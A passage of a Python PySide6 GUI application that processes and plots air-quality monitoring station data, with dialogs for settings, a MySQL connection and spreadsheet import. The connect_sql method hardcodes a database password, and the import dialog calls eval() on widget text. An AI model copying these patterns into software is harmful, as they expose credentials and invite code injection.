self.dataset_dialog.setWindowState(Qt.WindowNoState)\r\n return None\r\n\r\n def processar(self):\r\n ini = self.data_ini.date().toPython()\r\n fim = self.data_fim.date().toPython()\r\n\r\n # checa por inconsistencias\r\n n = len(self.arquivos)\r\n \r\n # Testes de verificacao\r\n # se nenhum arquivo foi aberto, notifique o usuario\r\n if n == 0:\r\n x = QMessageBox(QMessageBox.Warning, \"Erro\",\r\n 'Não é possível realizar o processamento', parent = self)\r\n x.addButton(QMessageBox.Ok)\r\n x.setInformativeText(\"Por favor, adicione pelo menos um conjunto de dados.\")\r\n x.exec()\r\n return None\r\n\r\n # se a data inicial for maior que a final\r\n elif ini > fim:\r\n x = QMessageBox(QMessageBox.Warning, \"Erro\",\r\n 'Não é possível realizer o processamento', parent = self)\r\n x.addButton(QMessageBox.Ok)\r\n x.setInformativeText(\"A data final especificada é menor do que a data inicial.\")\r\n x.exec()\r\n return None\r\n \r\n # ao passar os testes\r\n station_types = [0]*n\r\n for i in range(n):\r\n station_types[i] = self.arquivos[i].tipo\r\n unique_type = np.unique(station_types)\r\n\r\n # se estacoes de tipos diferentes forem adicionadas\r\n if unique_type.shape[0] > 1:\r\n x = QMessageBox(QMessageBox.Warning, \"Erro\",\r\n 'Não é possível realizar o processamento com tipos de estações diferentes.',\r\n parent = self\r\n )\r\n 
x.addButton(QMessageBox.Ok)\r\n            x.setInformativeText(\r\n                \"Por favor, mantenha aberto no programa somente estações de monitoramento do mesmo tipo.\"\r\n            )\r\n            x.exec()\r\n            return None\r\n\r\n        # Operacoes\r\n\r\n        # debug\r\n        self.ds = utilitarios.organize(self, ini, fim, unique_type[0])\r\n        # try:\r\n        #     # provoca um erro se nenhum paramtro for selecionado\r\n        #     self.ds = utilitarios.organize(self, ini, fim, unique_type[0])\r\n        # except:\r\n        #     x = QMessageBox(QMessageBox.Warning, \"Erro\",\r\n        #         'Não é possível realizar o processamento', parent = self)\r\n        #     x.addButton(QMessageBox.Ok)\r\n        #     x.setInformativeText(\"Por favor, selecione pelo menos um parâmetro.\")\r\n        #     x.exec()\r\n        #     return None\r\n\r\n        utilitarios.rotina_operacoes(self, unique_type[0])\r\n        gc.collect() # Chama o coletor de lixo, para liberar espaço\r\n\r\n        # prepara os resultados, segundo a representatividade, e checa se\r\n        # as series de dados resultantes nao estao vazias\r\n        lim = self.get_lim()\r\n        self.results = self.ds.mask_invalidos(lim)\r\n        if self.ds.is_empty(self.results):\r\n            x = QMessageBox(QMessageBox.Critical, \"Erro\", \"Dados inválidos\", parent = self)\r\n            x.addButton(QMessageBox.Ok)\r\n            x.setInformativeText('A série de dados se encontra vazia '\r\n                'ou composta somente por dados inválidos.')\r\n            x.exec()\r\n            return None\r\n\r\n        # finalmente plota, se nao houver problemas\r\n        self.updateGraph()\r\n\r\n    def clean_files(self):\r\n        self.arquivos = []\r\n        self.signature = []\r\n        # evita AttributeError quando nada foi processado ainda (self.ds is None)\r\n        if self.ds is not None:\r\n            self.ds.clear()\r\n        \r\n        # Libera memoria de objetos nao referenciados\r\n        gc.collect()\r\n        self.tabela.update()\r\n        \r\n    def get_lim(self):\r\n        groupby = self.ds.agrupar\r\n        if len(groupby) == 0:\r\n            ultima_operacao = \"Geral\"\r\n        \r\n        else:\r\n            time_freq = [\"Diária\", \"Mensal\", \"Anual\"]\r\n            known_freq = [\"Dia\", \"Mês\", \"Ano\"]\r\n            freq_dict = dict(zip(known_freq, time_freq))\r\n            \r\n            ultima_operacao = groupby[-1].split(\" \")[0]\r\n            ultima_operacao = freq_dict.get(ultima_operacao, \"Geral\")\r\n\r\n        lim = self.configs['representatividade'][ultima_operacao]\r\n        return lim\r\n\r\n    def updateGraph(self):\r\n        # Limpar o plot atual\r\n        self.canvas.reset()\r\n\r\n        if self.ds is not None:\r\n            graphTypes = [\r\n                self.canvas.linePlot,\r\n                self.canvas.barPlot,\r\n                self.canvas.ultrapassagensPlot\r\n            ]\r\n            graphTypes[self.GraficoTab.grafico_tipo.currentIndex()](\r\n                self.ds, self.results\r\n            )\r\n\r\n            if self.GraficoTab.check_limite.isChecked():\r\n                value = self.GraficoTab.value_limite.value()\r\n                self.canvas.hline_faixa(value)\r\n\r\n        ncols = self.GraficoTab.legend_cols.value()\r\n        size = self.GraficoTab.legend_fontsize.value()\r\n        self.canvas.updateLegend(ncols, size)\r\n        self.GraficoTab.eixos.updateProperties()\r\n        self.GraficoTab.update_table()\r\n\r\n        return True\r\n    \r\n    def remover_arquivo(self):\r\n        ''' comando para remover as estacoes ja abertas no programa\r\n        conforme selecionadas na tabela.'''\r\n        # Esse metodo varre toda a tabela em busca do selecionado.\r\n        for i in range(len(self.arquivos)):\r\n            TopLevelItem = self.tabela.items[i]\r\n            if TopLevelItem.isSelected():\r\n                entity_idx = TopLevelItem.child(0).data(1, 0)\r\n                del self.signature[entity_idx] # quem é ? 
nao lembro para que serve\r\n del self.arquivos[entity_idx]\r\n\r\n # Libera memoria de objetos nao referenciados\r\n gc.collect()\r\n\r\n # atualiza a tabela\r\n self.tabela.update()\r\n\r\n def exportar_excel(self):\r\n startpath = self.save_dir\r\n start = os.path.join(startpath)\r\n fname, filter = QFileDialog.getSaveFileName(\r\n parent = self,\r\n caption = \"Salvar tabela como...\",\r\n dir = start,\r\n filter = \"Excel files (*.xlsx)\",\r\n )\r\n if len(fname) > 0 and self.ds.shape[0] > 0:\r\n self.save_dir = os.path.dirname(fname)\r\n try:\r\n utilitarios.save_excel(self.ds, fname)\r\n\r\n except xlsxwriter.exceptions.FileCreateError as e:\r\n x = QMessageBox(QMessageBox.Critical, \"Erro\", \"Erro ao salvar\", parent = self)\r\n x.addButton(QMessageBox.Ok)\r\n x.setInformativeText('Não foi possível salvar a planilha de dados. '\r\n '\\nVerifique se ela esta aberta em outro programa.')\r\n x.exec()\r\n return None\r\n\r\n def closeEvent(self, event) -> None:\r\n if not self.dataset_dialog.isHidden():\r\n self.dataset_dialog.close()\r\n\r\n self.inventory.disconnect()\r\n return super().closeEvent(event)\r\n\r\n\r\nclass MyDialog(QDialog):\r\n '''\r\n Diálogo de Configurações\r\n '''\r\n\r\n def __init__(self, master):\r\n QDialog.__init__(self)\r\n self.master = master\r\n self.setWindowTitle(\"Configurações\")\r\n self.setFixedSize(500, 300)\r\n self.setModal(True)\r\n self.setWindowIcon(master.logo_icon)\r\n\r\n # Widgets\r\n #\r\n self.save_button = QPushButton(\"Salvar\")\r\n self.apply_button = QPushButton(\"Aplicar\")\r\n #\r\n self.WidgetRepresentatividade = QTableWidget()\r\n self.valueRepresentatividade = {}\r\n group = QGroupBox(\"Conexão do banco de dados\", parent = self)\r\n self.connect_button = QPushButton(\"Conectar\")\r\n self.hostname = QLineEdit(self.master.configs['conexao']['host'])\r\n self.Tabs = TabWidget()\r\n #\r\n data_group = QGroupBox(parent = self)\r\n self.criterios_button = [QCheckBox(x) for x in ['Válidos', 'Inválidos', \"Suspeitos\"]]\r\n for x in range(len(self.master.configs['criterios_dados'])):\r\n self.criterios_button[x].setChecked(self.master.configs['criterios_dados'][x])\r\n self.convert_ppm = QCheckBox(\"Converter unidade [ppb] para [ppm]\")\r\n self.convert_ppm.setChecked(self.master.configs['converter']['ppb2ppm'])\r\n #\r\n data = [int(x) for x in self.master.configs['semiautomatica']['data_referencia'].split('-')]\r\n self.semiautomatica = {\r\n 'reference_date' : QDateEdit(QDate(data[0], data[1], data[2])),\r\n \"frequency_days\" : QSpinBox()\r\n }\r\n self.semiautomatica['frequency_days'].setValue(self.master.configs['semiautomatica']['frequencia_dias'])\r\n\r\n # Configuracoes dos Widgets\r\n Header = self.WidgetRepresentatividade.horizontalHeader()\r\n Header.setSectionResizeMode(QHeaderView.Stretch)\r\n Header.resizeSections()\r\n self.WidgetRepresentatividade.setColumnCount(2)\r\n self.WidgetRepresentatividade.setHorizontalHeaderLabels([\"Representatividade\", \"Valor (%)\"])\r\n for k, v in master.configs['representatividade'].items():\r\n self.valueRepresentatividade[k] = QSpinBox()\r\n self.valueRepresentatividade[k].setRange(0, 100)\r\n self.valueRepresentatividade[k].setValue(v)\r\n self.WidgetRepresentatividade.setRowCount(len(self.valueRepresentatividade))\r\n self.runWidget()\r\n\r\n # Layouts\r\n LoginLayout = QGridLayout()\r\n LoginLayout.addWidget(QLabel(text = \"Host\"), 0, 0)\r\n LoginLayout.addWidget(self.hostname, 0, 1, 1, 2)\r\n LoginLayout.addWidget(self.connect_button, 3, 2)\r\n LoginLayout.setRowStretch(4, 
5)\r\n group.setLayout(LoginLayout)\r\n #\r\n criterios_layout = QVBoxLayout()\r\n criterios_layout.addWidget(QLabel(\"Somente considerar dados:\"))\r\n for x in self.criterios_button:\r\n criterios_layout.addWidget(x)\r\n\r\n criterios_layout.addWidget(QHLine())\r\n criterios_layout.addWidget(self.convert_ppm)\r\n criterios_layout.addWidget(QHLine())\r\n criterios_layout.addWidget(QLabel(\"Estações Semiautomáticas ->\"))\r\n qhbox1 = QHBoxLayout()\r\n qhbox1.addWidget(QLabel(\"Frequência de amostragem: \"))\r\n qhbox1.addWidget(self.semiautomatica['frequency_days'])\r\n qhbox1.addWidget(QLabel(\" Dias\"))\r\n qhbox1.addStretch(5)\r\n criterios_layout.addLayout(qhbox1)\r\n qhbox2 = QHBoxLayout()\r\n qhbox2.addWidget(QLabel(\"Data de referência: \"))\r\n qhbox2.addWidget(self.semiautomatica['reference_date'])\r\n qhbox2.addStretch(5)\r\n criterios_layout.addLayout(qhbox2)\r\n criterios_layout.addStretch(5)\r\n data_group.setLayout(criterios_layout)\r\n #\r\n self.Tabs.addTab(self.WidgetRepresentatividade, \"Representatividade\")\r\n self.Tabs.addTab(group, \"Conexão\")\r\n self.Tabs.addTab(data_group, \"Dados\")\r\n \r\n # Main layout and action buttons\r\n self.MainLayout = QVBoxLayout()\r\n buttonLayout = QHBoxLayout()\r\n self.MainLayout.addWidget(self.Tabs)\r\n buttonLayout.addStretch(10)\r\n buttonLayout.addWidget(self.save_button)\r\n buttonLayout.addWidget(self.apply_button)\r\n self.MainLayout.addLayout(buttonLayout)\r\n\r\n # Signals and Slots\r\n self.connect_button.clicked.connect(self.connect_sql)\r\n self.save_button.clicked.connect(self.save_json)\r\n self.apply_button.clicked.connect(lambda x: self.apply_changes(True))\r\n\r\n # init\r\n self.setLayout(self.MainLayout)\r\n\r\n def connect_sql(self):\r\n # username = self.username_widget.text()\r\n # password = self.password_widget.text()\r\n username = self.master.configs['conexao']['username']\r\n password = \"174784\"\r\n host = self.hostname.text()\r\n code = self.master.inventory.connect(username, password, host)\r\n if code != 1:\r\n if code == 1045:\r\n message = \"Acesso negado.\"\r\n informative_text = \"Login ou senha estão errados.\"\r\n elif code == 2005:\r\n message = \"Erro de conexão.\"\r\n informative_text = \"O host não existe ou se encontra offline.\"\r\n else:\r\n # fallback added: message/informative_text were otherwise undefined for any other code\r\n message = \"Erro desconhecido.\"\r\n informative_text = f\"Código de erro: {code}.\"\r\n x = QMessageBox(QMessageBox.Warning, \"Erro\",\r\n message, parent = self)\r\n x.addButton(QMessageBox.Ok)\r\n x.setInformativeText(informative_text)\r\n x.exec()\r\n else:\r\n message = \"Conectado.\"\r\n informative_text = \"A conexão com o servidor foi estabelecida.\"\r\n x = QMessageBox(parent = self)\r\n x.setText(message)\r\n x.addButton(QMessageBox.Ok)\r\n x.setInformativeText(informative_text)\r\n x.exec()\r\n \r\n self.master.dataset_dialog.search_empresas()\r\n\r\n return None\r\n\r\n def runWidget(self):\r\n i = 0\r\n for k, v in self.valueRepresentatividade.items():\r\n self.WidgetRepresentatividade.setCellWidget(i, 1, v)\r\n item = QTableWidgetItem(k)\r\n item.setFlags(item.flags() & ~Qt.ItemIsEditable)\r\n self.WidgetRepresentatividade.setItem(i, 0, item)\r\n i += 1\r\n\r\n def closeEvent(self, event) -> None:\r\n return super().closeEvent(event)\r\n\r\n def apply_changes(self, close = True):\r\n ''' Applies the changes and closes the window'''\r\n for k, v in self.valueRepresentatividade.items():\r\n self.master.configs['representatividade'][k] = v.value()\r\n\r\n for i in range(len(self.criterios_button)):\r\n status = self.criterios_button[i].isChecked()\r\n self.master.configs['criterios_dados'][i] = status\r\n\r\n 
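# --- Editor's aside (illustrative sketch) -------------------------------------
# connect_sql() above maps MySQL error codes (1045, 2005) to user-facing text
# with an if/elif chain; a dict with a .get() fallback keeps the message defined
# even for codes the chain does not anticipate. The wording below is
# hypothetical, not the application's actual strings:
MYSQL_ERRORS = {
    1045: ("Acesso negado.", "Login ou senha estão errados."),
    2005: ("Erro de conexão.", "O host não existe ou se encontra offline."),
}

def describe_mysql_error(code):
    # unknown codes get a generic fallback instead of raising NameError
    return MYSQL_ERRORS.get(code, ("Erro desconhecido.", f"Código de erro: {code}."))
# ------------------------------------------------------------------------------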
self.master.configs['converter']['ppb2ppm'] = self.convert_ppm.isChecked()\r\n \r\n format = Qt.DateFormat.ISODateWithMs\r\n date = self.semiautomatica[\"reference_date\"].date().toString(format)\r\n value = self.semiautomatica[\"frequency_days\"].value()\r\n self.master.configs['semiautomatica']['data_referencia'] = date\r\n self.master.configs['semiautomatica']['frequencia_dias'] = value\r\n\r\n if close:\r\n return self.close()\r\n\r\n def save_json(self):\r\n ''' Saves and applies the settings, but does not close the window'''\r\n\r\n self.apply_changes(close = False)\r\n self.master.save_configs()\r\n\r\n return None\r\n\r\nclass TabBar(QTabBar):\r\n def tabSizeHint(self, index):\r\n s = QTabBar.tabSizeHint(self, index)\r\n s.transpose()\r\n return s\r\n\r\n def paintEvent(self, event):\r\n painter = QStylePainter(self)\r\n opt = QStyleOptionTab()\r\n\r\n for i in range(self.count()):\r\n self.initStyleOption(opt, i)\r\n painter.drawControl(QStyle.CE_TabBarTabShape, opt)\r\n painter.save()\r\n\r\n s = opt.rect.size()\r\n s.transpose()\r\n r = QRect(QPoint(), s)\r\n r.moveCenter(opt.rect.center())\r\n opt.rect = r\r\n\r\n c = self.tabRect(i).center()\r\n painter.translate(c)\r\n painter.rotate(90)\r\n painter.translate(-c)\r\n painter.drawControl(QStyle.CE_TabBarTabLabel, opt)\r\n painter.restore()\r\n\r\n\r\nclass TabWidget(QTabWidget):\r\n def __init__(self, *args, **kwargs):\r\n QTabWidget.__init__(self, *args, **kwargs)\r\n self.setTabBar(TabBar(self))\r\n self.setTabPosition(QTabWidget.West)\r\n\r\n\r\nclass ProxyStyle(QProxyStyle):\r\n def drawControl(self, element, opt, painter, widget):\r\n if element == QStyle.CE_TabBarTabLabel:\r\n ic = self.pixelMetric(QStyle.PM_TabBarIconSize)\r\n r = QRect(opt.rect)\r\n w = 0 if opt.icon.isNull() else opt.rect.width() + self.pixelMetric(QStyle.PM_TabBarIconSize)\r\n r.setHeight(opt.fontMetrics.width(opt.text) + w)\r\n r.moveBottom(opt.rect.bottom())\r\n opt.rect = r\r\n QProxyStyle.drawControl(self, element, opt, painter, widget)\r\n\r\n\r\nclass DatasetDialog(QDialog):\r\n '''\r\n Dialog window holding the widgets used to import data, either from .xls\r\n spreadsheets or from the MySQL database.\r\n '''\r\n\r\n def __init__(self, master):\r\n QDialog.__init__(self)\r\n self.master = master\r\n self.setWindowTitle(\"Importar dados\")\r\n self.setFixedSize(400, 200)\r\n # self.setWindowIcon(QIcon(r'images\\icon6.ico'))\r\n self.setModal(False)\r\n self.setWindowIcon(master.logo_icon)\r\n\r\n # Widgets\r\n add_button = QPushButton(\"Adicionar\")\r\n cancel_button = QPushButton(\"Cancelar\")\r\n browse_button = QPushButton(\"...\")\r\n BuscaTab = QWidget()\r\n ImportTab = QWidget() \r\n self.empresas = QComboBox(BuscaTab)\r\n self.entidades = QComboBox(BuscaTab)\r\n self.atmos_path = QLineEdit(\"\")\r\n\r\n # Tab Widget\r\n self.tab = QTabWidget()\r\n self.tab.addTab(BuscaTab, \"Buscar\")\r\n self.tab.addTab(ImportTab, \"Importar [ATMOS]\")\r\n\r\n # Widget configuration\r\n self.search_empresas()\r\n self.atmos_path.setReadOnly(True)\r\n\r\n # Layouts\r\n busca_layout = QVBoxLayout()\r\n busca_layout.addWidget(QLabel(\"Empresa\"))\r\n busca_layout.addWidget(self.empresas)\r\n busca_layout.addWidget(QLabel(\"Entidade\"))\r\n busca_layout.addWidget(self.entidades)\r\n BuscaTab.setLayout(busca_layout)\r\n busca_layout.insertSpacing(-1, 100)\r\n #\r\n import_atmos_layout = QVBoxLayout()\r\n import_atmos_layout.addWidget(QLabel(\"Selecionar arquivo\"))\r\n secondary_layout = QHBoxLayout()\r\n 
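# --- Editor's aside (illustrative sketch) -------------------------------------
# apply_changes() above serializes the reference date with Qt's ISO date format
# so it survives the JSON config round trip. In PySide6 the round trip looks
# roughly like this:
from PySide6.QtCore import QDate, Qt

iso = QDate(2017, 1, 6).toString(Qt.DateFormat.ISODate)    # '2017-01-06'
restored = QDate.fromString(iso, Qt.DateFormat.ISODate)    # back to a QDate
assert restored == QDate(2017, 1, 6)
# ------------------------------------------------------------------------------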
secondary_layout.addWidget(self.atmos_path)\r\n secondary_layout.addWidget(browse_button)\r\n import_atmos_layout.addLayout(secondary_layout)\r\n import_atmos_layout.insertSpacing(-1, 100)\r\n ImportTab.setLayout(import_atmos_layout)\r\n #\r\n layout = QVBoxLayout()\r\n layout.addWidget(self.tab)\r\n saveclose_layout = QHBoxLayout()\r\n saveclose_layout.addWidget(add_button)\r\n saveclose_layout.addWidget(cancel_button)\r\n saveclose_layout.insertSpacing(0, 150)\r\n layout.addLayout(saveclose_layout)\r\n self.setLayout(layout)\r\n\r\n # Signals and Slots\r\n add_button.clicked.connect(self.add)\r\n cancel_button.clicked.connect(self.close)\r\n self.empresas.currentTextChanged.connect(self.search_entidades)\r\n browse_button.clicked.connect(self.browse_xls_files)\r\n\r\n def browse_xls_files(self):\r\n '''Opens a file-selection window and returns the path to the\r\n chosen file. If the user closes the window, an empty\r\n string is returned.'''\r\n startpath = self.master.save_dir\r\n start = os.path.join(startpath)\r\n caminho, x = QFileDialog.getOpenFileNames(self, \"Selecione um arquivo\",\r\n filter = \"Excel files (*.xls)\",\r\n dir= start\r\n )\r\n self.atmos_path.setText(str(caminho)[1:-1])\r\n\r\n def add(self):\r\n if self.tab.currentIndex() == 0:\r\n if not self.master.inventory.get_status():\r\n return None\r\n name_ = self.entidades.currentText()\r\n if not name_ in self.master.signature:\r\n self.master.arquivos.append(\r\n self.master.inventory.extrair_estacao(name_))\r\n self.master.signature.append(name_)\r\n else:\r\n caminho = eval('['+self.atmos_path.text()+']') # note: eval on widget text is fragile; it assumes atmos_path holds a quoted, comma-separated list\r\n if len(caminho) > 0:\r\n self.master.save_dir = os.path.dirname(caminho[0])\r\n for filepath in caminho:\r\n if filepath in self.master.signature: continue\r\n try:\r\n self.master.arquivos.append(utilitarios.xls2file(filepath))\r\n self.master.signature.append(filepath)\r\n except:\r\n continue\r\n\r\n self.master.tabela.update()\r\n return None\r\n\r\n def search_empresas(self):\r\n empresas = self.master.inventory.estacao_empresas\r\n self.empresas.clear()\r\n self.empresas.addItems(np.unique(empresas))\r\n self.search_entidades(self.empresas.currentText())\r\n return None\r\n\r\n def search_entidades(self, empresa):\r\n empresas = np.array(self.master.inventory.estacao_empresas)\r\n if empresas.shape[0] > 0:\r\n entidades = np.array(self.master.inventory.estacao_nomes)[empresas == empresa]\r\n self.entidades.clear()\r\n self.entidades.addItems(entidades)\r\n\r\n return None\r\n\r\n\r\nclass OperationsTable(QTableWidget):\r\n '''\r\n Class responsible for the behaviour of the operations table in the \"Dados\" tab\r\n '''\r\n\r\n def __init__(self, master):\r\n super().__init__(master)\r\n \r\n # table properties\r\n self.setRowCount(1)\r\n self.setColumnCount(3)\r\n self.setHorizontalHeaderLabels(\r\n [\"\", \"Operação\", \"Agrupar por\"]\r\n )\r\n Header = self.horizontalHeader()\r\n Header.setSectionResizeMode(1, QHeaderView.Stretch)\r\n Header.setSectionResizeMode(2, QHeaderView.Stretch)\r\n Header.resizeSections()\r\n \r\n # class attributes\r\n self.row_track = 0 # tracks the row holding the \"+\" button\r\n self.lista_calculo = [\"Média móvel\", \"Média aritmética\",\r\n \"Média geométrica\", \"Média harmônica\",\r\n \"Máximo\"]\r\n self.agrupar = [\"Não agrupar\", \"Dia\", \"Mês e ano\", \"Ano\"]\r\n\r\n # widgets\r\n self.add_button = QPushButton(text = \"+\")\r\n self.blank_cell1 = QTableWidgetItem()\r\n self.blank_cell2 = QTableWidgetItem()\r\n\r\n # widget configuration\r\n 
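# --- Editor's aside (illustrative sketch) -------------------------------------
# add() above recovers the list of selected paths with eval('[' + text + ']'),
# which executes whatever ends up in the line edit. Because browse_xls_files()
# stores str(list)[1:-1], ast.literal_eval can parse the same text while only
# accepting Python literals. A sketch; parse_path_list is a hypothetical helper,
# not the application's code:
import ast

def parse_path_list(text):
    """Turn "'a.xls', 'b.xls'" back into a list without executing code."""
    return list(ast.literal_eval('[' + text + ']')) if text.strip() else []
# ------------------------------------------------------------------------------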
self.setCellWidget(self.row_track, 0, self.add_button)\r\n self.blank_cell1.setFlags(self.blank_cell1.flags() & ~Qt.ItemIsEditable)\r\n self.blank_cell2.setFlags(self.blank_cell2.flags() & ~Qt.ItemIsEditable)\r\n self.setItem(self.row_track, 1, self.blank_cell1)\r\n self.setItem(self.row_track, 2, self.blank_cell2)\r\n\r\n # Signals and slots\r\n self.add_button.clicked.connect(self.create_filled_row)\r\n self.resizeColumnToContents(0)\r\n\r\n def create_filled_row(self):\r\n # Insert a row\r\n self.insertRow(self.row_track)\r\n\r\n # create widgets\r\n remove_button = QPushButton(text = \"-\")\r\n operation_combo = QComboBox()\r\n groupby_combo = QComboBox()\r\n\r\n # configure widgets\r\n operation_combo.addItems(self.lista_calculo)\r\n groupby_combo.addItems([\"8 horas\"])\r\n self.setCellWidget(self.row_track, 0, remove_button)\r\n self.setCellWidget(self.row_track, 1, operation_combo)\r\n self.setCellWidget(self.row_track, 2, groupby_combo)\r\n\r\n # signals and slots\r\n remove_button.clicked.connect(\r\n self.delete_row\r\n )\r\n operation_combo.currentTextChanged.connect(\r\n self.update_operation_box\r\n )\r\n self.row_track += 1\r\n\r\n return None\r\n\r\n def update_operation_box(self):\r\n row = self.currentRow()\r\n combobox = self.cellWidget(row, 1)\r\n\r\n is_media_movel = combobox.currentIndex() == 0\r\n group_combobox = self.cellWidget(row, 2)\r\n if is_media_movel:\r\n group_combobox.clear()\r\n group_combobox.addItems([\"8 horas\"])\r\n \r\n elif group_combobox.count() == 1:\r\n group_combobox.clear()\r\n group_combobox.addItems(self.agrupar)\r\n \r\n return None\r\n\r\n def delete_row(self):\r\n self.removeRow(self.currentRow())\r\n self.row_track -= 1\r\n\r\n return None\r\n\r\ndef main():\r\n # set the script's directory as the current one\r\n path = os.path.dirname(os.path.abspath(__file__))\r\n os.chdir(path)\r\n \r\n # start the application\r\n myappid = 'inea.ArES.1a' # arbitrary string\r\n ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)\r\n app = QApplication(sys.argv)\r\n w = MainWindow()\r\n w.show()\r\n\r\n # program styles\r\n # print(QFontDatabase().families())\r\n # with open(\"./styles/styles.qss\", \"r\") as f:\r\n # _style = f.read()\r\n # app.setStyleSheet(_style)\r\n\r\n # run the application\r\n sys.exit(app.exec())\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n ", "repo_name": "Lucas-Me/ArES-Old", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 49625, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "PySide6.QtWidgets.QFrame", "line_number": 22, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QFrame.HLine", "line_number": 28, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QFrame", "line_number": 28, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QFrame.Sunken", "line_number": 29, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QFrame", "line_number": 29, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTreeWidget", "line_number": 31, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QHeaderView.ResizeToContents", "line_number": 40, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QHeaderView", "line_number": 40, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTreeWidgetItem", "line_number": 55, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTreeWidgetItem", "line_number": 59, "usage_type": "call"}, {"api_name": 
"PySide6.QtCore.Qt.ItemIsUserCheckable", "line_number": 60, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 60, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt.Checked", "line_number": 64, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 64, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt.Unchecked", "line_number": 64, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt.Checked", "line_number": 83, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 83, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTreeWidget", "line_number": 91, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QHeaderView.Stretch", "line_number": 102, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QHeaderView", "line_number": 102, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 132, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QComboBox", "line_number": 133, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 134, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 135, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 136, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 137, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QDoubleSpinBox", "line_number": 138, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QDoubleSpinBox", "line_number": 139, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 140, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QDoubleSpinBox", "line_number": 141, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QDoubleSpinBox", "line_number": 142, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTreeWidgetItem", "line_number": 231, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTreeWidgetItem", "line_number": 239, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QWidget", "line_number": 249, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QGroupBox", "line_number": 269, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 270, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QComboBox", "line_number": 271, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLineEdit", "line_number": 272, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 273, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTableWidget", "line_number": 275, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGroupBox", "line_number": 276, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 277, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 278, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGroupBox", "line_number": 280, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGroupBox", "line_number": 281, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QComboBox", "line_number": 282, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QCheckBox", "line_number": 283, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 284, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 302, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 303, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGridLayout", 
"line_number": 306, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 313, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 314, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 316, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 320, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 323, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 328, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 329, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 331, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 334, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 339, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QColorDialog", "line_number": 385, "usage_type": "call"}, {"api_name": "PySide6.QtGui.QColor.fromRgb", "line_number": 388, "usage_type": "call"}, {"api_name": "PySide6.QtGui.QColor", "line_number": 388, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QHeaderView.Stretch", "line_number": 436, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QHeaderView", "line_number": 436, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTableWidgetItem", "line_number": 452, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTableWidgetItem", "line_number": 453, "usage_type": "call"}, {"api_name": 